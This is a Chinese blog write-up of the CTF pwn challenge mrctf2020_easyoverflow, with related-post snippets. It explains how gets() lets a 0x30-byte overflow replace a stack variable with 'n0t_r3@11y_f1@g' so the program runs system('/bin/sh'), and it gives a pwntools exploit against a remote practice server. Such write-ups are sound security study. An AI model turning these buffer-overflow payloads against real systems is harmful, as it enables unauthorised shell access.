mrctf2020_easyoverflow

最新推荐文章于 2023-05-25 09:16:53 发布
最新推荐文章于 2023-05-25 09:16:53 发布
阅读量367 收藏
点赞数
分类专栏: BUU-PWN 文章标签: pwn 安全 网络安全 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0sway/article/details/121899823
版权
"本文介绍了CTF比赛中的一道题目,涉及程序安全性检查、IDA分析和缓冲区溢出攻击。通过查看程序保护设置发现全开,进一步分析逻辑发现,只需令变量v5等于特定值fakeflag即可触发system("/bin/sh")。通过输入构造payload覆盖v5的值,成功getshell。最终给出了exploit代码实现远程连接并交互。"
摘要由CSDN通过智能技术生成

mrctf2020_easyoverflow

使用checksec查看:
在这里插入图片描述
保护全开!!!

放进IDA中看下:
在这里插入图片描述
大致逻辑:

  • 用户输入的变量v4
  • v5有定值
  • 调用check()函数传入参数v5
  • check(v5)为true就调用system("/bin/sh")

跟进check()函数查看:
在这里插入图片描述
思路明了,只需要v5 == fakeflag就能getshell,跟进查找fakeflag的值
在这里插入图片描述
再回来看输入点:

  • v4在var_70
  • v5在var_40

gets()函数不限制输入,那么可以输入v4时溢出到v5覆盖v5原来的值getshell

exp:

from pwn import *

#start
r = remote("node4.buuoj.cn",26478)
# r = process("../buu/mrctf2020_easyoverflow")

#params 

#attack
payload=b'M'*0x30 + b"n0t_r3@11y_f1@g"
r.sendline(payload)

r.interactive()
m0sway
关注
专栏目录
BUUCTF------mrctf2020_easyoverflow
qq_33010875的博客
10-08 374
环境:WSL2,ubuntu16.04,python2 checksec文件: 拖入ida分析: main函数中就有system(‘bin/sh’),只要check函数的返回值为1即可执行 查看check函数: 只要a1和fake_flag相等,函数就能返回1 a1就是main函数里的v5,值为:ju3t_@_f@k3_f1@g fake_flag的值为:n0t_r3@11y_f1@g 只要将v5的值覆盖为n0t_r3@11y_f1@g即可 main函数中有get函数可用, v4: v4是var_
mrctf2020_shellcode详解
最新发布
勿山几已
06-09 700
简单演示mrctf2020_shellcode解题步骤
[BUUCTF]PWN——mrctf2020_easyoverflow
mcmuyanga的博客
01-12 1008
mrctf2020_easyoverflow 附件 步骤: 例行检查,64位程序,保护全开 本地试运行的时候就直接一个输入,然后就没了,直接用64位ida打开 只要满足18行的条件,就能够获取shell check() 很简单的检查,就是判断一下v5是否等于n0t_r3@11y_f1@g 看main函数可以知道,v5一开始是ju3t_@_f@k3_f1@g,之后没有对v5的操作了,然后让我们输入v4,看一下v4和v5在栈上的位置,发现v5就在v4下方不远处 v4的输入是用的gets函数,我们可以在
BUUCTF(pwn)mrctf2020_easyoverflow
半岛铁盒的博客
04-06 603
简单的溢出覆盖 from pwn import * r=remote("node3.buuoj.cn",25789) payload='a'*0x30+"n0t_r3@11y_f1@g" r.sendline(payload) r.interactive()
mrctf2020_shellcode
K1ose的博客
04-21 628
拿到附件后,先file一下; 看到是个64bit的程序,拖到ida64里; 再checksec一下附件,看看保护情况; 栈没有保护,有可读可写可执行的段; 可以dbg调试一下,看看具体情况; 可以看到有一个段可读可写可执行,栈也确实没有什么保护; 现在去IDA分析一下程序; 变量参数如下 可以看到前几行在设置标准输入输出和错误; 接着输出"Show me your magic!"; 然后read一个400bytes的数据; 接着是关键代码,将$eax赋值给[rbp+var_4],接着与0进行比较
[MRCTF2020]hello_world_go-buuctf
Lenard404的博客
03-14 4360
Go语言的二进制文件,简单的明文flag,应该是Go逆向的引进门题目
BUUCTF Reverse/[MRCTF2020]hello_world_go
ookami6497的博客
07-26 600
BUUCTF Reverse/[MRCTF2020]hello_world_go 先看文件信息,没有加壳 看到题目有go,推测这是go语言编写的程序 下载好IDAGolangHelper,然后按alt + f7 选择 go_entry.py 上面两个是查看go语言信息的 检测到可能是这几个版本 选择一个版本,然后点击剩下的三个按钮,然后点OK,但是我的IDA(7.5版本)加载失败了,然后找了好久的解决方法还是搞不定 然后直接搜索字符串flag 跟进 这里按a
BUUCTF pwn——mrctf2020_easyoverflow
CNS-Enterprise BCC-1701-J
05-25 141
BUUCTF 做题练习
mrctf2020_easyoverflow [write up]
m0_73756460的博客
01-14 284
buuctf 刷题 mrctf2020_easyoverflow [write up]
[BUUCTF-pwn]——mrctf2020_easyoverflow
Y_peak的博客
03-29 240
[BUUCTF-pwn]——mrctf2020_easyoverflow 题目不难这里就简单讲下思路 思路 因为check函数返回0才可以得到shell. 通过gets函数,我们可以将v5修改为我们想要的。 找到fake_flag 为n0t_r3@11y_f1@g 修改为这个就可以了。相同肯定返回0. exploit from pwn import * p = remote("node3.buuoj.cn",26609) payload = 'a'* 0x30 + "n0t_r3@11y_f1@g" p.s
buu [MRCTF2020]EasyCpp
YenKoc的博客
04-17 806
上次没写出,这次认真分析了一下,发现自己的调试水平也有了上涨,也看了一些C++逆向的文章,尤其是stl,发现C++的oop还是挺复杂,这题还没考啥虚函数的还行了。 一.拖入ida,找到主函数,还是挺容易的 int __cdecl main(int argc, const char **argv, const char **envp) { double v3; // xmm0_8 __int...
[BUUCTF-pwn] ciscn_2019_nw_2
weixin_52640415的博客
10-28 286
[BUUCTF-pwn]— ciscn_2019_nw_2 题目地址: https://buuoj.cn/challenges#ciscn_2019_nw_2 checksec看保护-全开(堆题都一样可以不看) 菜单:只有add和free 且free未删指针有明显的UAF,而且是ubuntu18对应的libc-2.27版本可以直接free*2 free限制了次数3 add分两部分一个8字节一个68,这样可以独立修改fp的一部分 网上没搜到exp #先获取libc 只能free 3次,且块大小固定为0x7
hnctf-pwn-[week1]
m0_64174759的博客
11-20 1745
hnctf pwn week1 WP,栈溢出,格式化字符串,32位,64位rop,ret2shellcode,可见字符串,格式化字符串
PWN-整型溢出-攻防世界-PWN-int_overflow
安全知识学习-该平台为唯一原作者平台,其他平台属冒名顶替,请勿相信上当受骗
09-24 2218
目录 整型溢出漏洞是什么 攻防世界-PWN-int_overflow exp 整型溢出漏洞是什么 整型是一个特定的变量类型,在32位的系统中,一个整数一般占32位,而在64位的系统中一个整数占64位,(下面主要介绍32位整型溢出)为了表示正负(有符号),需要最高位来决定数值的,下面列举一些常见的整型的数值范围 在c语言中有这样的规定: 对于unsigned整型的溢出,溢出之后的数会和2^(8*字节)作模运算,例如一个unsigned char 溢出了,就会把溢出的数值与256求模 .
buuctf刷题 system参数取后面部分 shellcode House of Force 格式化泄漏base和libc unlink
carol2358的博客
07-19 531
wustctf2020_getshell_2 wustctf2020_getshell_2 有system和奇怪的参数,用参数的后面部分sh就好 ida里按g可以找地址 exp: from pwn import * from LibcSearcher import * local_file = './wustctf2020_getshell_2' local_libc = '/root/glibc-all-in-one/libs/2.23/libc-2.23.so' remote_libc =
MRCTF2020——crypto——Easy_RSA——babyRSA
weixin_44159598的博客
03-29 2409
babyrsa 根据主函数可知,首要目的是找到_P和_Q,首先来看_P 可以发现 题目已给出P[9],所以直接目的可以手动测试周围素数,直到找到全部(这里是一部分) 这里我们可以得到N factor = pow(p, base, n) 这一句说明我们应该将这个简单RSA解出来,此时按照一般RSA的步骤求得d 这里已经得到N的所有因数,所以此时N的欧拉函数为所有因数减1相乘,即(p1-...
[MRCTF2020]Ez_bypass
夜幕下的灯火阑珊的博客
05-14 3106
F12可以看到格式化好的源码 <?php #I put something in F12 for you include 'flag.php'; $flag='MRCTF{xxxxxxxxxxxxxxxxxxxxxxxxx}'; if(isset($_GET['gg'])&&isset($_GET['id'])) { $id=$_GET['id']; ...
buuctf misc [MRCTF2020]ezmisc 1
05-16
这是一个关于MRCTF2020比赛的misc题目,题目名称为ezmisc 1。不知道你需要什么样的帮助,我可以给你一些关于此题的信息。 题目描述: There are some problems to solve! Each problem corresponds to a flag. ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值